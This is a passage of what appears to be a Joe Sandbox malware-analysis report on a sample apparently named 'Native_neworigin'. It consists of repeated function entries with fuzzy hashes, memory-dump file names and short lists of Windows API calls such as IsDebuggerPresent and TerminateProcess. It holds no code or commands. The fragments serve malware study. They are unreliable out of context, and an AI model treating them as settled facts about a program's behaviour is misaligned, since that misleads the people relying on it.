Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2b7d000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: df1e42a6b7980017ef84b488529972620a9a2904e0da941a19902974b06e4c71
• Instruction ID: 415017974c2ddb48b213859648393e822c0d6657114b855a32726ebae128cbb6
• Opcode Fuzzy Hash: df1e42a6b7980017ef84b488529972620a9a2904e0da941a19902974b06e4c71
• Instruction Fuzzy Hash: E92122B1604205DFDB05DF14D9C0F26BF66FF98368F2086A9E9090B257C33AD416CBA2
Memory Dump Source
• Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf42872e8d1279b9090ed7456aceb94d34e3fbb6c1826c6cd5b1b9ff62f5544e
• Instruction ID: c941977d7fbf4b39625f67db653520cf9a9d609d5a00a0cdb4f303aa49d76cb5
• Opcode Fuzzy Hash: bf42872e8d1279b9090ed7456aceb94d34e3fbb6c1826c6cd5b1b9ff62f5544e
• Instruction Fuzzy Hash: 3F217131E103159FCF18DFA8D5559AEB7B2BF89710F10852AE816B7380EB719886CB51
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d954cfb24f63c315f4477149b00776cb20c30c10a75bdf7b6619b80b6540e90c
• Instruction ID: 44ec4a1b6ccbf82d4f8bc2ec3dacf765b2e291d3929b8d7107f84f021499af8f
• Opcode Fuzzy Hash: d954cfb24f63c315f4477149b00776cb20c30c10a75bdf7b6619b80b6540e90c
• Instruction Fuzzy Hash: FC113835B083585FCB466FBC585056E3FB7EFC5210B1444AAE505C7396DE318D0297A2
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b1477211c10d8a9a436f8eb1fcc36c447af653599bfdddf9d1087d4f8cb64c51
• Instruction ID: 13977d6ce3af58094c3ffd6bf5cc94caffd9b96eb281f3357f661b310ab93e2f
• Opcode Fuzzy Hash: b1477211c10d8a9a436f8eb1fcc36c447af653599bfdddf9d1087d4f8cb64c51
• Instruction Fuzzy Hash: 42212C34B1011A8FDB59ABB4D565A6E7BF3BF88304F604428D806DB398EF359C02CB41
Memory Dump Source
• Source File: 00000009.00000002.2397747273.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_2b7d000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3bec23678b3c126824e9619c01d71ac609458c5a8c6c8561c5855bd3a38f763a
• Instruction ID: 7d56affdf281a224404edacd2215fd0c9729194c29a2306c543fe1035fd085fa
• Opcode Fuzzy Hash: 3bec23678b3c126824e9619c01d71ac609458c5a8c6c8561c5855bd3a38f763a
• Instruction Fuzzy Hash: 5611AF76504245CFCB06CF10D5C4B16BF62FF94314F24C6A9D9490B256C336D45ADBA2
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3a0b4b58d727b68128c784ffb7f765f37d0499306e0c575d97fb6b8ca18ce7d4
• Instruction ID: 603c1afa96465eb3ea4a6b1d561e4dc3b60c8e3733ae6bd3cbc577cdfcc1e6e8
• Opcode Fuzzy Hash: 3a0b4b58d727b68128c784ffb7f765f37d0499306e0c575d97fb6b8ca18ce7d4
• Instruction Fuzzy Hash: 561126B68003499FDB10CF99C945BEEBFF5EB48320F148419E518A7610C339AA50DFA5
Memory Dump Source
• Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57675bb8c0c0918ccde6f3cbaa029a413471a5dbe494c90e1eefcbcfd70eceeb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5bb2e4650d7b1033a1a9eb1fee6a9d68daa5f3c4543563b8c621dfb1ebffd3d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57675bb8c0c0918ccde6f3cbaa029a413471a5dbe494c90e1eefcbcfd70eceeb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA11F931A00104CFDB04EFA8D985B8ABBBAFF80310F14C564C8485F669D7B5ED46CB91
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2397747273.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2b7d000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 93f7645cda08a83d2a7355d0831b8d6a47607534f856130cd5ffdd2d6d658e14
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3e46845eeea2fc5ee9f51a94b1a47d53347896ad1bd5718146d022b9666d9565
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93f7645cda08a83d2a7355d0831b8d6a47607534f856130cd5ffdd2d6d658e14
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC019E7140D3C09FD7124B258D94752BFA8EF53224F0984DBE8888F2A3C3695C45CB72
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2397747273.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2b7d000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 761a3144919261200a089d49e7a7521834282fd0734b1f7545de0713df02a234
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 86c0c33272f29395b12b6c31f5ed041773f5f76cc64a0479b2c6f33d7470ba58
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 761a3144919261200a089d49e7a7521834282fd0734b1f7545de0713df02a234
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5012B70504305DEE7208A25CD84B67FF9CEF423A4F18C4A9ED590B246C3799801CAB5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32cb9f75ff266517240a01b35606c9d5ecdee34db84feca50813ccea071238c2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e1cfd55dca21d0fe765b7e1ea4e897f168c4bd11bb087aa042b160fa68d7b430
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32cb9f75ff266517240a01b35606c9d5ecdee34db84feca50813ccea071238c2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E011734A00158CFEB18DB78D25AB6C3BB2FB89615F250058E51B9F2A0DF399D42CB01
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 045d5a8ba70a0543865abe79c7860a86de28b9b35ddf7ca1bcccd122e8ac882b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1996e51f7f22e9ae8a0fdd0bf8977f0fb3f6b230c6a9b3b82923cdeb7ea6d8df
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 045d5a8ba70a0543865abe79c7860a86de28b9b35ddf7ca1bcccd122e8ac882b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35017130A50109DFCB45FFB8FA58B9D7BBAEF41304F5046B8C0089B254DE71AA099B91
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cfaba3b033eac0c123abd938897609eadb92878a86ebfdb3fb079cbcac5521be
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9173fa27436ab7b408d3a24388bf5690000a02330f099e482d1459a05a3701e0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfaba3b033eac0c123abd938897609eadb92878a86ebfdb3fb079cbcac5521be
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F08135B001198FDB00CFA9D840BEEB7F1FF88326F148695E619A7294C634D9118BA0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e9f572a6784ca94ab3540cc2d1e0a091e60c7e8e0da621970f70130f49fea7c4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 82983511ff6ed321f54927fd6938b41f900704ab10e792e6cefebb72b5bfb624
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9f572a6784ca94ab3540cc2d1e0a091e60c7e8e0da621970f70130f49fea7c4
• Instruction Fuzzy Hash: CD01623095020CDFCB45FFB4FA58A9D7BBADF81304F5046B8C0099B254DE716B099B91
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19218ce36d60900ade4ce24411222edbf43a9eb0026fb63f1786a8d2814b935c
• Instruction ID: 38e463e37e7af04798c893b4a0ad5b05235c2c2e75e5ff42ee2d47a842c60c55
• Opcode Fuzzy Hash: 19218ce36d60900ade4ce24411222edbf43a9eb0026fb63f1786a8d2814b935c
• Instruction Fuzzy Hash: D0F089367002196F9F059E9C9C409AF7BABEBC8250B444529FA19C3250DF31892197A5
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 391b3220de214ce1500a40f19c5c9fc07289eeeea043af1ce2edb56ec53a6239
• Instruction ID: 6202839fd2ba0e8c6189234fdebbcaeb5c07104877a3df343fe2b53c3a58e368
• Opcode Fuzzy Hash: 391b3220de214ce1500a40f19c5c9fc07289eeeea043af1ce2edb56ec53a6239
• Instruction Fuzzy Hash: 70F0E571D202269FCB40DFB998012EABBFCEF05254F118826E50DD3204F6308A10CBD2
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19d2121098b6a97795efc350411907af5971119bdd516367402c25059cb97143
• Instruction ID: b4d2c64d25628c7b0ba6f8df2fc89eb954894bbf8a82d09f374ae8999308f252
• Opcode Fuzzy Hash: 19d2121098b6a97795efc350411907af5971119bdd516367402c25059cb97143
• Instruction Fuzzy Hash: D4E02631F042364BAB4471BC65A02BD239AE7C4610B200C79CA19CB789ED66CC8203C2
Memory Dump Source
• Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 394a8404ddab3ec2a8dbc5a6ae95e075fb773d25b9508b19ea187268831b056b
• Instruction ID: 0fbb36737b93531e6eb5780f5d961c60ac0e9f68b5c26eda2c5172c0767fb51b
• Opcode Fuzzy Hash: 394a8404ddab3ec2a8dbc5a6ae95e075fb773d25b9508b19ea187268831b056b
• Instruction Fuzzy Hash: FAE08C363400149FC744E7ADE545F2D3BEAEF8C611B544069FA0ECB320EE69DC028791
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f06d3fb15929d6cac865bc45deb3fa6cd5ce5b04f42ae6aef249f14adc68c23b
• Instruction ID: b0bc9c981218c8d6c5e966c1d055a4dcd720275e3d2f3008e7e01e7c4e072731
• Opcode Fuzzy Hash: f06d3fb15929d6cac865bc45deb3fa6cd5ce5b04f42ae6aef249f14adc68c23b
• Instruction Fuzzy Hash: B6E04871D102269F8B50DEBD9D011AF7BFCEB45154F118876D50DD3204F630CA1087D1
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3ba40bd7efdac070fc15049b5a02c6c06c08d85424105328f3379fc297c1291
• Instruction ID: d78f0560093562021fec588876feda908c51f517bbb90c3b9c3eb3f52477fcf4
• Opcode Fuzzy Hash: a3ba40bd7efdac070fc15049b5a02c6c06c08d85424105328f3379fc297c1291
• Instruction Fuzzy Hash: 9CE0C235D3432E8BFF206B68E44A36B379CF704214F200415F50AC3B04EB12C480C6D1
Memory Dump Source
• Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f3ff426ebb6c5240cbfe9b30f9d976c1c0329ec624c1d3a71c59de4c58255af
• Instruction ID: 5f0a60847c2605d01f68b0e12ec7d8dd8642de94c6857c8c9a849c366795aa6f
• Opcode Fuzzy Hash: 5f3ff426ebb6c5240cbfe9b30f9d976c1c0329ec624c1d3a71c59de4c58255af
• Instruction Fuzzy Hash: 16D05E353400105FC704A76DE508E6D3BEAEF8C61179440A9FA0ECB361EE94DC0287A2
Strings
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID: d$w
• API String ID: 0-2400632791
• Opcode ID: deb8ffe72919674885fd208dd25e416feb8b5b0a17f63c634a4e16adbfc99cd5
• Instruction ID: d2c525605c3841b1bf7b09e679c895ab26d19a1da57f0877d8f84570936d6b70
• Opcode Fuzzy Hash: deb8ffe72919674885fd208dd25e416feb8b5b0a17f63c634a4e16adbfc99cd5
• Instruction Fuzzy Hash: A8D16530A0F34CAFCAF54B288C19B797A6CFBA1724F4E0156E556C60F3D798DC049A22
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002,00000000,?,00862038,00000003), ref: 00863F5E
                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002,00000000,?,00862038,00000003), ref: 00863F65
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00863F77
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7c83396f08331c2e9394982c8520995c27f9a004bf649c0591ab68ee283a48c2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3301bde06216474e6339e5518da4bbb0f374aa2bfc436cafb8027a0636aae899
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c83396f08331c2e9394982c8520995c27f9a004bf649c0591ab68ee283a48c2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51E04631404908ABCF016F28DD09E593B39FB46341F026414F806EA232DB76EE82CA82
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
• Instruction Fuzzy Hash:
APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02BD18E0), ref: 004170C5
• MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
• _malloc.LIBCMT ref: 0041718A
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• _malloc.LIBCMT ref: 0041724C
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• __freea.LIBCMT ref: 004172A4
• __freea.LIBCMT ref: 004172AD
• ___ansicp.LIBCMT ref: 004172DE
• ___convertcp.LIBCMT ref: 00417309
• LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
• _malloc.LIBCMT ref: 00417362
• _memset.LIBCMT ref: 00417384
• LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
• ___convertcp.LIBCMT ref: 004173BA
• __freea.LIBCMT ref: 004173CF
• LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
• String ID:
• API String ID: 3809854901-0
• Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
